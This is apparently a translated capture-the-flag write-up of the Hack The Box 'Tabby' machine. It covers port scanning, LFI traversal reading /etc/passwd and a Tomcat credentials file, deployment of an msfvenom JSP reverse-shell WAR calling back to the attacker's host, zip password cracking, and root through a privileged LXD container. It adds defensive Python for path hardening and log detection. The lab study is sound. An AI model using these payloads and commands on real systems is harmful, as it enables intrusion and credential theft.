Disclaimer
The host penetrated in this article was legitimately authorized. The tools and methods used here are for learning and exchange only; please do not use the tools and penetration ideas in this article for any illegal purpose. I accept no responsibility for any consequences arising from this, nor for any misuse or damage caused.
Service enumeration
Check open ports
┌──(rootkali)-[~/htb/Tabby]
└─# nmap -p- 10.10.10.194 --open
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 04:22 EST
Nmap scan report for 10.10.10.194
Host is up (0.25s latency).
Not shown: 64733 closed ports, 799 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
Nmap done: 1 IP address (1 host up) scanned in 249.82 seconds
Port details
┌──(rootkali)-[~/htb/Tabby]
└─# nmap -sV -T4 -A -O 10.10.10.194 -p 22,80,8080
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 04:33 EST
Nmap scan report for 10.10.10.194
Host is up (0.29s latency).
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
|   256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_  256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp   open  http       Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http       Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   292.67 ms 10.10.14.1
2   293.43 ms 10.10.10.194

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.08 seconds
There are two HTTP services: port 80 is Apache, port 8080 is Tomcat.
Port 80
Opening port 80, the NEWS tab navigates to http://megahosting.htb/news.php?file=statement
Add megahosting.htb to the local hosts file:
echo "10.10.10.194 megahosting.htb" >> /etc/hosts
NEWS
The page shows:
We apologise to all our customers for the previous data breach.
We have changed the site to remove this tool, and have invested heavily in more secure servers
So there has already been a data breach, oh?
Noticed the file parameter in the URL, which looks like a filename. Entered http://megahosting.htb/news.php?file=../../../../../etc/passwd
The target's /etc/passwd was successfully echoed back, proving an LFI exists:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
There is a regular user, ash.
For files that do not exist or that the web server has no permission to read, the page returns nothing at all.
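As an added example (not code from the original post or from the site on the box), this is how the file parameter should have been handled, sketched in Python: an allowlist of page names plus a realpath check confining the read to the pages directory, contrasted with the unchecked join the box exhibited. The layout (pages under a files/ directory beneath the docroot) is an assumption for the demo.

```python
"""Hardened handling of a file= page parameter (added example, not the
original news.php): an allowlist of page names plus a realpath confinement
check, so ../../../../../etc/passwd is rejected outright. The layout, pages
under <docroot>/files, is assumed for the demo."""
import os
import re
import tempfile
from typing import Optional

ALLOWED_PAGES = {"statement"}                   # the only page the site links to
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")  # no '/', '.', '%' or NUL


def vulnerable_resolve(docroot: str, requested: str) -> str:
    """The behaviour the box exhibited: the parameter is joined onto the page
    directory unchecked, so ../ sequences walk out of the web root."""
    return os.path.normpath(os.path.join(docroot, "files", requested))


def resolve_page(docroot: str, requested: str) -> Optional[str]:
    """Return the absolute path of an allowed page, or None if the request is
    not an allowlisted name that resolves inside <docroot>/files."""
    if not NAME_RE.fullmatch(requested) or requested not in ALLOWED_PAGES:
        return None
    base = os.path.realpath(os.path.join(docroot, "files"))
    candidate = os.path.realpath(os.path.join(base, requested))
    # Even an allowlisted name must resolve inside base: a symlink dropped
    # into files/ must not be able to point the read elsewhere.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo() -> dict:
    """Compare both resolvers on the write-up's payloads inside a throwaway
    docroot (constructed); every value should come back True."""
    traversal = "../../../../../etc/passwd"
    tomcat_users = "../../../../../usr/share/tomcat9/etc/tomcat-users.xml"
    with tempfile.TemporaryDirectory() as docroot:
        pages = os.path.join(docroot, "files")
        os.makedirs(pages)
        with open(os.path.join(pages, "statement"), "w") as fh:
            fh.write("We apologise to all our customers ...\n")
        return {
            "legit_served": resolve_page(docroot, "statement") is not None,
            "traversal_blocked": resolve_page(docroot, traversal) is None,
            "tomcat_users_blocked": resolve_page(docroot, tomcat_users) is None,
            "vulnerable_escapes": not vulnerable_resolve(docroot, traversal).startswith(pages),
        }
```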
Port 8080 service
The home page on port 8080 exposes some information; combined with the LFI on port 80, we might be able to get something done.
It works !

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

You might consider installing the following packages, if you haven't already done so:

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui". The host-manager webapp is restricted to users with role "admin-gui". Users are defined in /etc/tomcat9/tomcat-users.xml.
It exposes the web root path: /var/lib/tomcat9/webapps/ROOT/
http://10.10.10.194:8080/docs/
shows the Tomcat version is Version 9.0.31
It also shows that the admin user configuration file is at /etc/tomcat9/tomcat-users.xml, but that file cannot be displayed through the LFI.
Set up a Tomcat of the same version locally; the resources are here
Look at the directory structure
┌──(rootkali)-[/var/lib/tomcat9]
└─# ls
bin  BUILDING.txt  conf  CONTRIBUTING.md  lib  LICENSE  logs  NOTICE  README.md  RELEASE-NOTES  RUNNING.txt  temp  webapps  work
conf
┌──(rootkali)-[/var/lib/tomcat9/conf]
└─# ls
catalina.policy  catalina.properties  context.xml  jaspic-providers.xml  jaspic-providers.xsd  logging.properties  server.xml  tomcat-users.xml  tomcat-users.xsd  web.xml
The conf folder should be at the same level as webapps, but nothing ever comes back in the browser...
Looking at the local tomcat9, it seems none of its files are readable.
curl
Later, following a forum hint, it turns out you need to install it directly with apt install tomcat9.
Check the location of tomcat-users.xml
┌──(rootkali)-[~/htb/Tabby]
└─# find / -name tomcat-users.xml
/etc/tomcat9/tomcat-users.xml
/usr/share/tomcat9/etc/tomcat-users.xml
/etc/tomcat9/tomcat-users.xml is not readable by a regular user:
┌──(rootkali)-[~/htb/Tabby]
└─# ls -alh /etc/tomcat9/tomcat-users.xml
-rw-r----- 1 root tomcat 2.7K 11月 10 03:15 /etc/tomcat9/tomcat-users.xml
But /usr/share/tomcat9/etc/tomcat-users.xml is readable by a regular user:
┌──(rootkali)-[~/htb/Tabby]
└─# ls -alh /usr/share/tomcat9/etc/tomcat-users.xml
-rw-r--r-- 1 root root 2.7K 11月 10 03:15 /usr/share/tomcat9/etc/tomcat-users.xml
Use the payload http://10.10.10.194/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-users.xml
Opened in a browser, you have to view the page source to see the configuration,
but with curl it echoes back immediately:
curl -X GET -H 'Content-type:text/xml' http://10.10.10.194/news.php?file=../../../../../usr/share/tomcat9/etc/tomcat-users.xml
tomcat-users.xml configuration:
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
We get a Tomcat back-end account: tomcat:$3cureP4s5w0rd123!
But this account only has admin-gui and manager-script, not manager-gui, so we cannot open the manager page and cannot use the exploit.
But later I found that curl can reach the manager back end:
┌──(rootkali)-[~/htb/Tabby]
└─# curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:2:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs
Following the method in HackTricks
Build the reverse shell:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=4242 -f war -o revshell.war
Upload the reverse shell
┌──(rootkali)-[~/htb/Tabby]
└─# curl --upload-file revshell.war -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/revshell"
OK - Deployed application at context path [/revshell]
Open in the browser: http://10.10.10.194:8080/revshell/
Got the reverse shell
┌──(rootkali)-[~/htb/Tabby]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.194] 50070
id
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
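From the defender's side, both halves of this foothold leave clear traces in the web server logs: the traversal in news.php's file parameter, and the authenticated requests to /manager/text/ (the text interface that the manager-script role authorizes). The following is an added detection sketch, not code from the original post; the log lines are constructed in combined log format to mirror the requests above.

```python
"""Detection sketch (added example, not from the original post): scan Apache
and Tomcat access logs for the two request patterns used in this write-up,
traversal in news.php's file= parameter and deployment through the Tomcat
manager text interface. The log lines are constructed, not captured."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in combined log format (source, user, time, request, status).
SAMPLE_LOG = """\
10.10.16.3 - - [30/Dec/2021:04:40:11 -0500] "GET /news.php?file=statement HTTP/1.1" 200 1205
10.10.16.3 - - [30/Dec/2021:04:41:02 -0500] "GET /news.php?file=../../../../../etc/passwd HTTP/1.1" 200 2800
10.10.16.3 - - [30/Dec/2021:04:42:30 -0500] "GET /news.php?file=..%2F..%2F..%2F..%2F..%2Fusr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 2000
10.10.16.3 - tomcat [30/Dec/2021:05:01:45 -0500] "GET /manager/text/list HTTP/1.1" 200 400
10.10.16.3 - tomcat [30/Dec/2021:05:02:10 -0500] "PUT /manager/text/deploy?path=/revshell HTTP/1.1" 200 60
10.10.16.3 - - [30/Dec/2021:05:02:20 -0500] "GET /revshell/ HTTP/1.1" 200 0
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")   # a '..' path segment anywhere


def classify(line: str):
    """Return (label, actor, target) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # parse_qs decodes once; unquote again so double-encoded '..' is caught too.
    for value in parse_qs(url.query).get("file", []):
        if TRAVERSAL_RE.search(unquote(value)):
            return ("lfi_traversal", m["src"], m["target"])
    if url.path.startswith("/manager/text/") and url.path.endswith("/deploy"):
        # manager-script role: a single authenticated request deploys a WAR
        return ("manager_deploy", m["user"], m["target"])
    if url.path.startswith("/manager/"):
        return ("manager_access", m["user"], m["target"])
    return None


def scan(log_text: str):
    """Run classify() over every line and keep the hits, in log order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]
```

Alerting on any successful /manager/text/deploy from an address that is not the deployment pipeline, and on any file= value containing a '..' segment, would have caught both steps before the listener on port 4242 ever connected.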
user
In /var/www/html/files, found an encrypted zip file, 16162020_backup.zip
After downloading it locally, convert it with zip2john into a format john can recognize
┌──(rootkali)-[~/htb/Tabby]
└─# /usr/sbin/zip2john 16162020_backup.zip >zip.hash
16162020_backup.zip/var/www/html/assets/ is not encrypted!
ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: 2b chk, TS_chk, cmplen=338, decmplen=766, crc=282B6DE2
ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6
ver 1.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: 2b chk, TS_chk, cmplen=2906, decmplen=2894, crc=2F9F45F
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: 2b chk, TS_chk, cmplen=114, decmplen=123, crc=5C67F19E
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: 2b chk, TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
Cracking it yields a password
┌──(rootkali)-[~/htb/Tabby]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it         (16162020_backup.zip)
1g 0:00:00:01 DONE (2021-12-31 03:15) 0.7246g/s 7509Kp/s 7509Kc/s 7509KC/s adnc153..adenabuck
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Decrypt the zip
┌──(rootkali)-[~/htb/Tabby]
└─# unzip 16162020_backup.zip
Archive:  16162020_backup.zip
[16162020_backup.zip] var/www/html/favicon.ico password:
  inflating: var/www/html/favicon.ico
   creating: var/www/html/files/
  inflating: var/www/html/index.php
 extracting: var/www/html/logo.png
  inflating: var/www/html/news.php
  inflating: var/www/html/Readme.txt
But no useful files were found, so try logging in to ash's account with the cracked password
tomcat@tabby:~$ su ash
su ash
Password: admin@it
ash@tabby:/opt/tomcat$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
ash@tabby:/opt/tomcat$ whoami
whoami
ash
Success.
root
Checking group information, the ash account is in the lxd group
ash@tabby:/var/lib/tomcat9$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
Following the privilege escalation method in HackTricks, Method 2
On the Kali side:
Clone the repository locally
git clone https://github.com/saghul/lxd-alpine-builder
Build:
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
Start an HTTP server with python on the attacking machine, and fetch the built image file onto the target
wget http://10.10.16.3:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
On the target side, import the image and initialize. Note: this cannot be done in the /tmp directory, only under /home/ash/
ash@tabby:~$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
<e-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
ash@tabby:~$ lxd init
Accept the defaults all the way through.
Escalate to root
ash@tabby:~$ lxc init myimage mycontainer -c security.privileged=true
lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
ash@tabby:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
ash@tabby:~$ lxc start mycontainer
lxc start mycontainer
ash@tabby:~$ lxc exec mycontainer /bin/sh
lxc exec mycontainer /bin/sh
~ # ^[[50;5Rid
id
uid=0(root) gid=0(root)
~ # ^[[50;5Rwhoami
whoami
root
Find root.txt
~ # ^[[50;5Rfind / -name root.txt
find / -name root.txt
/mnt/root/root/root.txt
Summary
Foothold was the hardest part: without understanding Tomcat's configuration and probing with curl, you cannot get the initial shell. HackTricks really is our good friend! When you are out of ideas, be sure to check it often.
User was very simple.
When escalating to root, operating in the /tmp directory at first kept throwing errors saying the image file path could not be found. Later I figured these paths might be a bit odd inside docker, tried loading from the lxd admin ash's home directory, and it finally succeeded.